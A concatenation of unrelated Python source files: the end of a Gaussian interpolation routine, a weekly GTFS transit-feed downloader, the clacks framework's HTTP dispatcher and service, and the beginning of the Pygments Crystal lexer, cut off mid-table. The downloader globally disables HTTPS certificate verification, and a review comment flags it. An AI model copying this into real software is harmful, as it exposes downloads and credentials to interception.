    # Center of the time window; equivalent to the original Py2 int(ntime/2 + 0.5).
    midTime = vtime[ntime // 2]
    wlat2 = wlat / 2.
    wlon2 = wlon / 2.
    lat0 = lat[0]
    lon0 = lon[0]
    dlat = lat[1] - lat[0]    # assumes a uniformly spaced input grid -- TODO confirm
    dlon = lon[1] - lon[0]

    def _clamp(i, lo, hi):
        '''Clamp index i into the inclusive range [lo, hi].'''
        return lo if i < lo else (hi if i > hi else i)

    for i in range(noutlat):
        print(outlat[i], file=sys.stderr)    # progress trace: one line per output latitude
        for j in range(noutlon):
            # Window of input indices within +/- half the lat/lon window.
            imin = _clamp(int((outlat[i] - wlat2 - lat0) / dlat + 0.5), 0, nlat - 1)
            imax = _clamp(int((outlat[i] + wlat2 - lat0) / dlat + 0.5), 0, nlat - 1)
            if imin > imax:
                imin, imax = imax, imin    # input latitudes could be descending
            jmin = _clamp(int((outlon[j] - wlon2 - lon0) / dlon + 0.5), 0, nlon - 1)
            jmax = _clamp(int((outlon[j] + wlon2 - lon0) / dlon + 0.5), 0, nlon - 1)
            # Accumulate gaussian-weighted contributions from every unmasked
            # neighbor in the window, over all input time steps.
            for kin in range(ntime):
                for iin in range(imin, imax + 1):
                    for jin in range(jmin, jmax + 1):
                        if not vmask[kin, iin, jin]:
                            fac = exp(vfactor *
                                      (((outlat[i] - lat[iin]) / slat) ** 2
                                       + ((outlon[j] - lon[jin]) / slon) ** 2
                                       + ((midTime - vtime[kin]) / stime) ** 2))
                            val = var[kin, iin, jin]
                            vinterp[i, j] = vinterp[i, j] + val * fac
                            vweight[i, j] = vweight[i, j] + fac
            if vweight[i, j] != 0.0:
                vinterp[i, j] = vinterp[i, j] / vweight[i, j]
            else:
                vinterp[i, j] = missingValue
    return (vinterp, vweight, status)
#@jit( int32(int32,int32,int32), nopython=False)
def clamp(i, n, m):
    """Clamp i to the inclusive range [n, m]."""
    return n if i < n else (m if i > m else i)
|
<gh_stars>10-100
"""
Manage downloading of GTFS files over multiple locations.
This file handles
- Reading in gtfs-sources.yaml that describes data sources
- Checking already-downloaded data
- Downloading data, if it is time to do so again
For running the weekly periodic download, use:
python pipeline/downloads.py scrape
"""
import calendar
import datetime
import os
import sys
from urllib.request import FancyURLopener
import yaml
import time
from os.path import join
from gtfspy import util
import ssl
# SECURITY NOTE(review): this globally disables HTTPS certificate verification
# for every urllib request in the process -- presumably to cope with feed hosts
# whose certificates fail validation.  Consider a per-source opt-in instead.
ssl._create_default_https_context = ssl._create_unverified_context
from settings import RAW_DATA_DIR_PARENT_DIR
# data layout:
#
# - $location is the standard location slug.
# - $date is the date, in YYYY-MM-DD format
# - $part is the partition-slug if data comes in several files.
# Is "main" if only one partition.
#
# The following are some of the currently defined output files (only
# the first is managed here, the rest in Makefile_data.
#
# scratch/rawgtfs/$location/$date/$zone/gtfs.zip
# scratch/proc/$location/$date/$zone-gtfs/
# scratch/proc/$location/$date/$zone.sqlite
# scratch/proc/$location/$date/$zone.stats
#os.chdir("../")
# To handle downloading once per week, we map all days to a "week
# number". A download is done only once per week, as seen by the week
# numbers. Week numbering starts at midnight Wednesday (UTC) and
# lasts one week.
WEEK_NUMBER_EPOCH = 1445990400 # Unixtime of 2015,10,28 00:00 UTC.
WEEK_NUMBER_INTERVAL = 3600*24*7 # One week in seconds
def week_number(dt):
    """Return the normalized week number: weeks since 2015-10-28 00:00 UTC.

    This is the hashing function used to download data once per week.
    Weeks start on Wednesdays; dates are hashed with this function and a
    download happens once per bucket.
    """
    # Seconds since the week-numbering epoch (2015-10-28 00:00 UTC).
    seconds_since_epoch = calendar.timegm(dt.timetuple()) - WEEK_NUMBER_EPOCH
    return int(seconds_since_epoch // WEEK_NUMBER_INTERVAL)
def week_date(week_number):
    """Inverse of week_number: given a week number, return the datetime of its start.

    Returns: datetime.datetime in UTC.
    """
    unixtime = WEEK_NUMBER_EPOCH + WEEK_NUMBER_INTERVAL * week_number
    return datetime.datetime.utcfromtimestamp(unixtime)
def week_number_now():
    """Return the week number of the current UTC time."""
    return week_number(datetime.datetime.utcnow())
class Location(object):
"""Location Manager - handles dealing with multiple locations.
"""
slug = None
name = None
#gtfs_urls = { }
def __init__(self, slug, data):
"""Set basic properties of the data structure"""
self.slug = slug
if data is None:
self.data = { }
elif isinstance(data, str):
self.data = dict(notes=data)
else:
self.data = data
self._parse_data(self.data)
def _parse_data(self, data):
"""Initial parsing of scraping data.
The data includes the different regions and URLs. It sets up
self.gtfs_urls[zone_name] to be the data for each zone, and if
there is only one zone without a name, it is named "main".
"""
self.name = data.get('name', self.slug)
gtfs = data.get('gtfs')
if isinstance(gtfs, str):
self.gtfs_urls = dict(main=data['gtfs'])
elif isinstance(gtfs, dict):
self.gtfs_urls = gtfs
elif gtfs is None:
self.gtfs_urls = { }
else:
raise ValueError("Unknown gtfs key format: %s"%(gtfs, ))
# A bunch of methods that return standard file paths.
# Directories related to raw GTFS.
@property
def rawdir(self):
"""Base dir for GTFS downloads"""
return join(RAW_DATA_DIR_PARENT_DIR, 'rawgtfs/%s/' % self.slug)
def rawdir_dt(self, dt):
"""Base directory for one date"""
return join(self.rawdir, dt.strftime('%Y-%m-%d'))
def rawdir_zone(self, dt, zone):
"""Base directory for one GTFS file"""
return join(self.rawdir, dt.strftime('%Y-%m-%d'), zone)
@property
def procdir(self):
return join(RAW_DATA_DIR_PARENT_DIR, 'proc/%s/' % self.slug)
def procdir_dt(self, dt):
"""Base directory for one date"""
return join(self.procdir, dt.strftime('%Y-%m-%d'))
def procdir_zone(self, dt, zone):
"""Base directory for one GTFS file"""
return join(self.procdir, dt.strftime('%Y-%m-%d'), zone)
def path_gtfsdir(self, dt, zone):
"""Directory for extracted GTFS files"""
return join(self.procdir_zone(dt, zone), 'gtfs')
def path_gtfszip(self, dt, zone):
return join(self.rawdir_zone(dt, zone), 'gtfs.zip')
# Functions Related to downloading and unpacking.
def daily_download(self):
"""Download all files, if not already there.
For each zone, see if there is already a download for this
week (as found by week_number), and if not, then do that
download.
"""
for zone, url in self.gtfs_urls.items():
week_now = week_number_now()
# Get most recent download
zone_dates = self.list_zone_dates()
if zone not in zone_dates:
week_lastdownload = float('-inf')
else:
week_lastdownload = week_number(zone_dates[zone][-1])
if week_now > week_lastdownload:
dt = datetime.datetime.utcnow()
#zipfile = self.path_gtfszip(dt, zone)
#if not os.path.exists(zip):
self.gtfs_download(url, dt, zone)
#self.gtfs_extract(dt, zone)
def gtfs_download(self, url, dt, zone):
"""Do downloading of one file."""
print("Downloading", self.slug, url, zone, dt)
# Use only standard library functions to avoid dependencies.
#furl = urllib.urlopen(url)
opener = FancyURLopener()
# We have to set up an authentication method on the opener if
# we will need to authenticate. This does HTTP BASIC only so
# far.
if 'authentication' in self.data:
auth_name = self.data['authentication']
auth = auth_data['sites'][auth_name]
# A callback method which performs the authentication.
# Return (user, pass) tuple.
opener.prompt_user_passwd = \
lambda host, realm: (auth['username'], auth['password'])
# URL parameters auth method
if 'url_suffix' in auth:
url = url + auth['url_suffix']
if "{API_KEY}" in url:
try:
auth_name = self.data['authentication']
except KeyError:
auth_name = self.name
auth = auth_data['sites'][auth_name]
url = url.format(API_KEY=auth['API_KEY'])
# Make GTFS path.
gtfs_path = self.path_gtfszip(dt, zone)
util.makedirs(os.path.dirname(gtfs_path))
# Open the URL.
print("**** Connecting to %s" % url)
# Open GTFS and relay data from web to file.
with util.create_file(gtfs_path) as tmp_gtfs_path:
opener.retrieve(url, tmp_gtfs_path)
self.test_corrupted_zip(gtfs_path)
# Done
#def gtfs_extract(self, dt, zone):
# # Get paths, make target directory.
# gtfs_zip = self.path_gtfszip(dt, zone)
# gtfs_dir = self.path_gtfsdir(dt, zone)
# util.makedirs(gtfs_dir)
# # Open zipfile, get file names.
# zip = zipfile.ZipFile(gtfs_zip, 'r')
# names = zip.namelist()
# # Exatract every name that matches a basic sanity check.
# # zipfile module is supposed to do this too, but we'll be safe
# # here.
# for name in names:
# assert '/' not in name
# assert '\\' not in name
# assert not name.startswith('.')
# zip.extract(name, gtfs_dir)
# zip.close()
def test_corrupted_zip(self, zip_path):
import zipfile
try:
zip_to_test = zipfile.ZipFile(zip_path)
warning = zip_to_test.testzip()
if warning is not None:
print("ERROR: zipfile created warning: " + str(warning))
else:
print("No warnings")
except:
print("ERROR: zipfile for " + self.name + " not created")
# Getting information about available files
def list_dates(self):
"""List all dates for which any files may have been downloaded."""
if not os.path.isdir(self.rawdir):
return [ ]
names = os.listdir(self.rawdir)
dates = [ ]
for name in sorted(names):
if os.path.isdir(join(self.rawdir, name)):
dates.append(datetime.datetime.strptime(name, '%Y-%m-%d'))
return sorted(dates)
def list_files(self, dt):
"""List all zones downloaded on a given date."""
path = self.rawdir_dt(dt)
files = sorted(os.listdir(path))
return files
def list_zone_dates(self):
"""Return a dict of zone->[dt1, dt2, ...]"""
data = { }
for dt in self.list_dates():
for zone in self.list_files(dt):
data.setdefault(zone, []).append(dt)
return data
def load_data(fname):
    """Load the YAML source list and build one Location per site.

    Returns a dict mapping site name -> Location.
    """
    # `with` closes the handle (the original leaked it), and safe_load
    # avoids arbitrary-object construction from the config file; plain
    # yaml.load() without a Loader also fails on PyYAML >= 6.
    with open(fname) as f:
        data = yaml.safe_load(f)
    sites = data['sites']
    locations = {}
    for name, site_data in sites.items():
        locations[name] = Location(name, site_data)
    return locations
def main_status(locations):
    """Print a human-readable download report, one location at a time."""
    for name, location in sorted(locations.items()):
        dates = location.list_dates()
        if not dates:
            print("No data for location: '" + name + "'")
            continue
        print(name + ":")
        for dt in dates:
            print(" ", dt.strftime("%Y-%m-%d"))
            for dir_ in sorted(location.list_files(dt)):
                print(" ", dir_)
if __name__ == "__main__":
    # Credentials for sites that need them (HTTP BASIC / API keys).
    # safe_load + `with`: credentials are plain data, and the handle is
    # closed (the original used yaml.load on an unclosed file object).
    with open('credentials.yaml') as f:
        auth_data = yaml.safe_load(f)
    cmd = sys.argv[1]
    # Second argument is used if one wants to download a specific city
    # or cities.  NOTE(review): `name in cities` below is a substring
    # test on the raw argv string -- presumably intended; confirm.
    try:
        cities = sys.argv[2]
    except IndexError:  # was a bare except; only "argument missing" is expected
        cities = None
    locations = load_data('gtfs-sources.yaml')
    if cmd == 'status':
        main_status(locations)
    elif cmd == 'test':
        locations['test'].daily_download()
        locations['test2'].daily_download()
    elif cmd == 'scrape':
        rawgtfs_dir = join(RAW_DATA_DIR_PARENT_DIR, 'rawgtfs/')
        if not os.path.exists(rawgtfs_dir):
            raise OSError(rawgtfs_dir + " is not available. Perhaps you should mount it?")
        # Fixed format string: was "%H:%M%S" (missing colon), which
        # printed times like "12:3045".
        print(time.strftime("%Y-%m-%d %H:%M:%S"))
        for name, L in locations.items():
            try:
                if cities and name not in cities:
                    continue
                L.daily_download()
                print(name)
            except Exception:
                import traceback
                print("import of " + name + " failed")
                print('=' * 20)
                traceback.print_exc()
                print('=' * 20)
        print("... done with all.")
|
# This file is part of the clacks framework.
#
# http://clacks-project.org
#
# Copyright:
# (C) 2010-2012 GONICUS GmbH, Germany, http://www.gonicus.de
#
# License:
# GPL-2: http://www.gnu.org/licenses/gpl-2.0.html
#
# See the LICENSE file in the project's top-level directory for details.
"""
The *HTTPService* and the *HTTPDispatcher* are responsible for exposing
registered `WSGI <http://wsgi.org>`_ components to the world. While the
*HTTPService* is just providing the raw HTTP service, the *HTTPDispatcher*
is redirecting a path to a module.
-------
"""
import thread
import logging
import tornado.wsgi
import tornado.web
from tornado.ioloop import IOLoop
from tornado.httpserver import HTTPServer
from zope.interface import implements
from webob import exc #@UnresolvedImport
from clacks.common import Environment
from clacks.common.handler import IInterfaceHandler
from clacks.common.utils import N_
from clacks.common.error import ClacksErrorHandler as C
from clacks.agent.exceptions import HTTPException
# Register this module's error codes with the central error handler so
# C.make_error() can resolve them later.
C.register_codes(dict(
    HTTP_PATH_ALREADY_REGISTERED=N_("'%(path)s' has already been registered")
))
class HTTPDispatcher(object):
    """
    WSGI dispatcher that routes an incoming request path to one of the
    registered applications.

    Matching is *exact* by default; a WSGI class that sets the class
    variable ``http_subtree`` to *True* is additionally matched for
    every path below its registration point.
    """

    def __init__(self):
        self.__app = {}
        self.env = Environment.getInstance()
        self.log = logging.getLogger(__name__)

    def __call__(self, environ, start_response):
        path = environ.get('PATH_INFO')
        # Longest registered path first, so nested registrations win.
        for candidate in sorted(self.__app, key=len, reverse=True):
            handler = self.__app[candidate]
            subtree_prefix = candidate if candidate == "/" else candidate + "/"
            if hasattr(handler, "http_subtree") and path.startswith(subtree_prefix):
                return handler(environ, start_response)
            if path == candidate:
                return handler(environ, start_response)

        # No application claimed the path -> 404.
        self.log.debug('no resource %s registered!' % path)
        not_found = exc.HTTPNotFound('no resource %s registered!' % path)
        return not_found(environ, start_response)

    def register(self, path, app):
        """Serve WSGI application *app* on *path*."""
        self.log.debug("registering %s on %s" % (app.__class__.__name__, path))
        self.__app[path] = app

    def unregister(self, path):
        """Remove the application registered on *path*, if any."""
        if path in self.__app:
            self.log.debug("unregistering %s" % path)
            del self.__app[path]
class HTTPService(object):
    """
    Class to serve HTTP fragments to the interested client. It makes
    use of a couple of configuration flags provided by the clacks
    configuration files ``[http]`` section:

    ============== =============
    Key            Description
    ============== =============
    url            AMQP URL to connect to the broker
    id             User name to connect with
    key            Password to connect with
    command-worker Number of worker processes
    ============== =============

    Example::

        [http]
        host = node1.intranet.gonicus.de
        port = 8080
        sslpemfile = /etc/clacks/host.pem

    If you want to create a clacks agent module that is going to export
    functionality (i.e. static content or some RPC functionality) you
    can register such a component like this::

        >>> from clacks.common.components import PluginRegistry
        >>> class SomeTest(object):
        ...    http_subtree = True
        ...    path = '/test'
        ...
        ...    def __init__(self):
        ...        # Get http service instance
        ...        self.__http = PluginRegistry.getInstance('HTTPService')
        ...
        ...        # Register ourselves
        ...        self.__http.register(self.path, self)
        ...

    When *SomeTest* is instantiated, it will register itself to the
    *HTTPService* - and will be served when the *HTTPService* starts up.
    """
    # zope.interface declaration (Python 2 style `implements`).
    implements(IInterfaceHandler)
    _priority_ = 10  # load order relative to other IInterfaceHandlers

    # NOTE(review): these registries are *class-level* mutable dicts and
    # therefore shared by every instance.  That looks intentional here
    # (components register before serve() runs on the singleton) --
    # confirm before refactoring to instance attributes.
    __register = {}
    __register_ws = {}
    __register_static = {}

    def __init__(self):
        env = Environment.getInstance()
        self.log = logging.getLogger(__name__)
        self.log.info("initializing HTTP service provider")
        self.env = env
        # All of these are filled in by serve().
        self.srv = None
        self.ssl = None
        self.app = None
        self.host = None
        self.scheme = None
        self.port = None

    def serve(self):
        """
        Start HTTP service thread.

        Reads host/port/SSL settings from the ``[http]`` config section,
        assembles a tornado application (static handlers, websocket
        handlers, then the WSGI dispatcher as catch-all fallback) and
        starts the IOLoop on a background thread.
        """
        self.app = HTTPDispatcher()
        self.host = self.env.config.get('http.host', default="localhost")
        self.port = self.env.config.get('http.port', default=8080)
        self.ssl = self.env.config.get('http.ssl', default=None)

        if self.ssl and self.ssl.lower() in ['true', 'yes', 'on']:
            self.scheme = "https"
            ssl_options = dict(
                certfile=self.env.config.get('http.certfile', default=None),
                keyfile=self.env.config.get('http.keyfile', default=None),
                ca_certs=self.env.config.get('http.ca-certs', default=None))
        else:
            self.scheme = "http"
            ssl_options = None

        apps = []

        # Make statics registerable
        for pth, local_pth in self.__register_static.items():
            apps.append((pth, tornado.web.StaticFileHandler, {"path": local_pth}))

        # Make websockets available if registered
        for pth, ws_app in self.__register_ws.items():
            apps.append((pth, ws_app))

        # Finally add the WSGI handler (matches everything not claimed
        # by a static or websocket handler above).
        wsgi_app = tornado.wsgi.WSGIContainer(self.app)
        apps.append((r".*", tornado.web.FallbackHandler, dict(fallback=wsgi_app)))

        application = tornado.web.Application(apps)

        # Fetch server
        self.srv = HTTPServer(application, ssl_options=ssl_options)
        self.srv.listen(self.port, self.host)
        thread.start_new_thread(IOLoop.instance().start, ())
        self.log.info("now serving on %s://%s:%s" % (self.scheme, self.host, self.port))

        # Register all possible instances that have shown
        # interest in being served
        for path, obj in self.__register.items():
            self.app.register(path, obj)

    def stop(self):
        """
        Stop HTTP service thread.
        """
        self.log.debug("shutting down HTTP service provider")
        IOLoop.instance().stop()

    def register(self, path, app):
        """
        Register the application *app* on path *path*.

        ================= ==========================
        Parameter         Description
        ================= ==========================
        path              Path part of an URL - i.e. '/rpc'
        app               WSGI application
        ================= ==========================

        Raises HTTPException when *path* is already taken by a static
        or websocket registration.
        """
        if path in self.__register_static or path in self.__register_ws:
            raise HTTPException(C.make_error("HTTP_PATH_ALREADY_REGISTERED", path=path))

        self.__register[path] = app

    def register_static(self, path, local_path):
        """
        Register a static directory *local_path* in the web servers
        *path*.

        ================= ==========================
        Parameter         Description
        ================= ==========================
        path              Path part of an URL - i.e. '/static'
        local_path        Local path to serve from - i.e. '/var/www'
        ================= ==========================

        Raises HTTPException when *path* is already taken by a WSGI
        or websocket registration.
        """
        if path in self.__register or path in self.__register_ws:
            raise HTTPException(C.make_error("HTTP_PATH_ALREADY_REGISTERED", path=path))

        self.__register_static[path] = local_path

    def register_ws(self, path, app):
        """
        Register the websocket application *app* on path *path*.

        ================= ==========================
        Parameter         Description
        ================= ==========================
        path              Path part of an URL - i.e. '/ws'
        app               WSGI application
        ================= ==========================

        Raises HTTPException when *path* is already taken by a WSGI
        or static registration.
        """
        if path in self.__register or path in self.__register_static:
            raise HTTPException(C.make_error("HTTP_PATH_ALREADY_REGISTERED", path=path))

        self.__register_ws[path] = app
|
<reponame>dreamflasher/client
# -*- coding: utf-8 -*-
"""
pygments.lexers.crystal
~~~~~~~~~~~~~~~~~~~~~~~
Lexer for Crystal.
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import ExtendedRegexLexer, include, \
bygroups, default, LexerContext, words
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Error
__all__ = ['CrystalLexer']
# Matches one source line including its newline; used to re-scan
# heredoc bodies line by line.
line_re = re.compile('.*?\n')

# Operator tokens Crystal allows as method/symbol names.  Longer
# operators are listed before their prefixes (e.g. '<=>' before '<=')
# so the alternation built by words() matches greedily.
CRYSTAL_OPERATORS = [
    '!=', '!~', '!', '%', '&&', '&', '**', '*', '+', '-', '/', '<=>', '<<', '<=', '<',
    '===', '==', '=~', '=', '>=', '>>', '>', '[]=', '[]?', '[]', '^', '||', '|', '~'
]
class CrystalLexer(ExtendedRegexLexer):
    """
    For `Crystal <http://crystal-lang.org>`_ source code.

    .. versionadded:: 2.2
    """

    name = 'Crystal'
    aliases = ['cr', 'crystal']
    filenames = ['*.cr']
    mimetypes = ['text/x-crystal']

    flags = re.DOTALL | re.MULTILINE

    def heredoc_callback(self, match, ctx):
        """Tokenize heredocs: emit the opener, remember the delimiter,
        lex the rest of the line (which may open further heredocs), and
        once back at the outermost opener scan forward emitting each
        heredoc body up to its terminator line."""
        # okay, this is the hardest part of parsing Crystal...
        # match: 1 = <<-?, 2 = quote? 3 = name 4 = quote? 5 = rest of line
        start = match.start(1)
        yield start, Operator, match.group(1)  # <<-?
        yield match.start(2), String.Heredoc, match.group(2)  # quote ", ', `
        yield match.start(3), String.Delimiter, match.group(3)  # heredoc name
        yield match.start(4), String.Heredoc, match.group(4)  # quote again

        heredocstack = ctx.__dict__.setdefault('heredocstack', [])
        outermost = not bool(heredocstack)
        # '<<-' form: the terminator line is compared with strip() below,
        # so it may be indented.
        heredocstack.append((match.group(1) == '<<-', match.group(3)))

        ctx.pos = match.start(5)
        ctx.end = match.end(5)
        # this may find other heredocs
        for i, t, v in self.get_tokens_unprocessed(context=ctx):
            yield i, t, v
        ctx.pos = match.end()

        if outermost:
            # this is the outer heredoc again, now we can process them all
            for tolerant, hdname in heredocstack:
                lines = []
                for match in line_re.finditer(ctx.text, ctx.pos):
                    if tolerant:
                        check = match.group().strip()
                    else:
                        check = match.group().rstrip()
                    if check == hdname:
                        # Terminator found: flush the collected body lines.
                        for amatch in lines:
                            yield amatch.start(), String.Heredoc, amatch.group()
                        yield match.start(), String.Delimiter, match.group()
                        ctx.pos = match.end()
                        break
                    else:
                        lines.append(match)
                else:
                    # end of heredoc not found -- error!
                    for amatch in lines:
                        yield amatch.start(), Error, amatch.group()
            ctx.end = len(ctx.text)
            del heredocstack[:]

    def gen_crystalstrings_rules():
        """Build the 'strings' state plus all per-delimiter sub-states.

        Deliberately has no *self*: it is called once below at
        class-creation time to extend `tokens`.
        """
        def intp_regex_callback(self, match, ctx):
            # Lex the regex body in a fresh 'interpolated-regex' context.
            yield match.start(1), String.Regex, match.group(1)  # begin
            nctx = LexerContext(match.group(3), 0, ['interpolated-regex'])
            for i, t, v in self.get_tokens_unprocessed(context=nctx):
                yield match.start(3)+i, t, v
            yield match.start(4), String.Regex, match.group(4)  # end[imsx]*
            ctx.pos = match.end()

        def intp_string_callback(self, match, ctx):
            # Same idea for %-strings, in an 'interpolated-string' context.
            yield match.start(1), String.Other, match.group(1)
            nctx = LexerContext(match.group(3), 0, ['interpolated-string'])
            for i, t, v in self.get_tokens_unprocessed(context=nctx):
                yield match.start(3)+i, t, v
            yield match.start(4), String.Other, match.group(4)  # end
            ctx.pos = match.end()

        states = {}
        states['strings'] = [
            (r'\:@{0,2}[a-zA-Z_]\w*[!?]?', String.Symbol),
            (words(CRYSTAL_OPERATORS, prefix=r'\:@{0,2}'), String.Symbol),
            (r":'(\\\\|\\'|[^'])*'", String.Symbol),
            # This allows arbitrary text after '\ for simplicity
            (r"'(\\\\|\\'|[^']|\\[^'\\]+)'", String.Char),
            (r':"', String.Symbol, 'simple-sym'),
            # Crystal doesn't have "symbol:"s but this simplifies function args
            (r'([a-zA-Z_]\w*)(:)(?!:)', bygroups(String.Symbol, Punctuation)),
            (r'"', String.Double, 'simple-string'),
            (r'(?<!\.)`', String.Backtick, 'simple-backtick'),
        ]

        # double-quoted string and symbol
        for name, ttype, end in ('string', String.Double, '"'), \
                                ('sym', String.Symbol, '"'), \
                                ('backtick', String.Backtick, '`'):
            states['simple-'+name] = [
                include('string-escaped' if name == 'sym' else 'string-intp-escaped'),
                (r'[^\\%s#]+' % end, ttype),
                (r'[\\#]', ttype),
                (end, ttype, '#pop'),
            ]

        # braced quoted strings: one state family per bracket pair.
        for lbrace, rbrace, bracecc, name in \
                ('\\{', '\\}', '{}', 'cb'), \
                ('\\[', '\\]', '\\[\\]', 'sb'), \
                ('\\(', '\\)', '()', 'pa'), \
                ('<', '>', '<>', 'ab'):
            states[name+'-intp-string'] = [
                (r'\\[' + lbrace + ']', String.Other),
                (lbrace, String.Other, '#push'),
                (rbrace, String.Other, '#pop'),
                include('string-intp-escaped'),
                (r'[\\#' + bracecc + ']', String.Other),
                (r'[^\\#' + bracecc + ']+', String.Other),
            ]
            states['strings'].append((r'%' + lbrace, String.Other,
                                      name+'-intp-string'))
            states[name+'-string'] = [
                (r'\\[\\' + bracecc + ']', String.Other),
                (lbrace, String.Other, '#push'),
                (rbrace, String.Other, '#pop'),
                (r'[\\#' + bracecc + ']', String.Other),
                (r'[^\\#' + bracecc + ']+', String.Other),
            ]
            # http://crystal-lang.org/docs/syntax_and_semantics/literals/array.html
            states['strings'].append((r'%[wi]' + lbrace, String.Other,
                                      name+'-string'))
            states[name+'-regex'] = [
                (r'\\[\\' + bracecc + ']', String.Regex),
                (lbrace, String.Regex, '#push'),
                (rbrace + '[imsx]*', String.Regex, '#pop'),
                include('string-intp'),
                (r'[\\#' + bracecc + ']', String.Regex),
                (r'[^\\#' + bracecc + ']+', String.Regex),
            ]
            states['strings'].append((r'%r' + lbrace, String.Regex,
                                      name+'-regex'))

        # these must come after %<brace>!
        states['strings'] += [
            # %r regex
            (r'(%r([\W_]))((?:\\\2|(?!\2).)*)(\2[imsx]*)',
             intp_regex_callback),
            # regular fancy strings with qsw
            (r'(%[wi]([\W_]))((?:\\\2|(?!\2).)*)(\2)',
             intp_string_callback),
            # special forms of fancy strings after operators or
            # in method calls with braces
            (r'(?<=[-+/*%=<>&!^|~,(])(\s*)(%([\t ])(?:(?:\\\3|(?!\3).)*)\3)',
             bygroups(Text, String.Other, None)),
            # and because of fixed width lookbehinds the whole thing a
            # second time for line startings...
            (r'^(\s*)(%([\t ])(?:(?:\\\3|(?!\3).)*)\3)',
             bygroups(Text, String.Other, None)),
            # all regular fancy strings without qsw
            (r'(%([\[{(<]))((?:\\\2|(?!\2).)*)(\2)',
             intp_string_callback),
        ]

        return states

    tokens = {
        'root': [
            (r'#.*?$', Comment.Single),
            # keywords
            (words('''
                abstract asm as begin break case do else elsif end ensure extend ifdef if
                include instance_sizeof next of pointerof private protected rescue return
                require sizeof super then typeof unless until when while with yield
            '''.split(), suffix=r'\b'), Keyword),
            (words(['true', 'false', 'nil'], suffix=r'\b'), Keyword.Constant),
            # start of function, class and module names
            (r'(module|lib)(\s+)([a-zA-Z_]\w*(?:::[a-zA-Z_]\w*)*)',
             bygroups(Keyword, Text, Name.Namespace)),
            (r'(def|fun|macro)(\s+)((?:[a-zA-Z_]\w*::)*)',
             bygroups(Keyword, Text, Name.Namespace), 'funcname'),
            (r'def(?=[*%&^`~+-/\[<>=])', Keyword, 'funcname'),
            (r'(class|struct|union|type|alias|enum)(\s+)((?:[a-zA-Z_]\w*::)*)',
             bygroups(Keyword, Text, Name.Namespace), 'classname'),
            (r'(self|out|uninitialized)\b|(is_a|responds_to)\?', Keyword.Pseudo),
            # macros
            (words('''
                debugger record pp assert_responds_to spawn parallel
                getter setter property delegate def_hash def_equals def_equals_and_hash
                forward_missing_to
            '''.split(), suffix=r'\b'), Name.Builtin.Pseudo),
            (r'getter[!?]|property[!?]|__(DIR|FILE|LINE)__\b', Name.Builtin.Pseudo),
            # builtins
            # http://crystal-lang.org/api/toplevel.html
            (words('''
                Object Value Struct Reference Proc Class Nil Symbol Enum Void
                Bool Number Int Int8 Int16 Int32 Int64 UInt8 UInt16 UInt32 UInt64
                Float Float32 Float64 Char String
                Pointer Slice Range Exception Regex
                Mutex StaticArray Array Hash Set Tuple Deque Box Process File
                Dir Time Channel Concurrent Scheduler
                abort at_exit caller delay exit fork future get_stack_top gets
                lazy loop main p print printf puts
                raise rand read_line sleep sprintf system with_color
            '''.split(), prefix=r'(?<!\.)', suffix=r'\b'), Name.Builtin),
            # normal heredocs
            (r'(?<!\w)(<<-?)(["`\']?)([a-zA-Z_]\w*)(\2)(.*?\n)',
             heredoc_callback),
            # empty string heredocs
            (r'(<<-?)("|\')()(\2)(.*?\n)', heredoc_callback),
            (r'__END__', Comment.Preproc, 'end-part'),
            # multiline regex (after keywords or assignments)
            (r'(?:^|(?<=[=<>~!:])|'
             r'(?<=(?:\s|;)when\s)|'
             r'(?<=(?:\s|;)or\s)|'
             r'(?<=(?:\s|;)and\s)|'
             r'(?<=\.index\s)|'
             r'(?<=\.scan\s)|'
             r'(?<=\.sub\s)|'
             r'(?<=\.sub!\s)|'
             r'(?<=\.gsub\s)|'
             r'(?<=\.gsub!\s)|'
             r'(?<=\.match\s)|'
             r'(?<=(?:\s|;)if\s)|'
             r'(?<=(?:\s|;)elsif\s)|'
             r'(?<=^when\s)|'
             r'(?<=^index\s)|'
             r'(?<=^scan\s)|'
             r'(?<=^sub\s)|'
             r'(?<=^gsub\s)|'
             r'(?<=^sub!\s)|'
             r'(?<=^gsub!\s)|'
             r'(?<=^match\s)|'
             r'(?<=^if\s)|'
             r'(?<=^elsif\s)'
             r')(\s*)(/)', bygroups(Text, String.Regex), 'multiline-regex'),
            # multiline regex (in method calls or subscripts)
            (r'(?<=\(|,|\[)/', String.Regex, 'multiline-regex'),
            # multiline regex (this time the funny no whitespace rule)
            (r'(\s+)(/)(?![\s=])', bygroups(Text, String.Regex),
             'multiline-regex'),
            # lex numbers and ignore following regular expressions which
            # are division operators in fact (grrrr. i hate that. any
            # better ideas?)
            # since pygments 0.7 we also eat a "?" operator after numbers
            # so that the char operator does not work. Chars are not allowed
            # there so that you can use the ternary operator.
            # stupid example:
            #   x>=0?n[x]:""
            (r'(0o[0-7]+(?:_[0-7]+)*(?:_?[iu][0-9]+)?)\b(\s*)([/?])?',
             bygroups(Number.Oct, Text, Operator)),
            (r'(0x[0-9A-Fa-f]+(?:_[0-9A-Fa-f]+)*(?:_?[iu][0-9]+)?)\b(\s*)([/?])?',
             bygroups(Number.Hex, Text, Operator)),
            (r'(0b[01]+(?:_[01]+)*(?:_?[iu][0-9]+)?)\b(\s*)([/?])?',
             bygroups(Number.Bin, Text, Operator)),
            # 3 separate expressions for floats because any of the 3 optional
            # parts makes it a float
            (r'((?:0(?![0-9])|[1-9][\d_]*)(?:\.\d[\d_]*)(?:e[+-]?[0-9]+)?'
             r'(?:_?f[0-9]+)?)(\s*)([/?])?',
             bygroups(Number.Float, Text, Operator)),
            (r'((?:0(?![0-9])|[1-9][\d_]*)(?:\.\d[\d_]*)?(?:e[+-]?[0-9]+)'
             r'(?:_?f[0-9]+)?)(\s*)([/?])?',
             bygroups(Number.Float, Text, Operator)),
            (r'((?:0(?![0-9])|[1-9][\d_]*)(?:\.\d[\d_]*)?(?:e[+-]?[0-9]+)?'
             r'(?:_?f[0-9]+))(\s*)([/?])?',
             bygroups(Number.Float, Text, Operator)),
            (r'(0\b|[1-9][\d]*(?:_\d+)*(?:_?[iu][0-9]+)?)\b(\s*)([/?])?',
             bygroups(Number.Integer, Text, Operator)),
            # Names
            (r'@@[a-zA-Z_]\w*', Name.Variable.Class),
            (r'@[a-zA-Z_]\w*', Name.Variable.Instance),
            (r'\$\w+', Name.Variable.Global),
            (r'\$[!@&`\'+~=/\\,;.<>_*$?:"^-]', Name.Variable.Global),
            (r'\$-[0adFiIlpvw]', Name.Variable.Global),
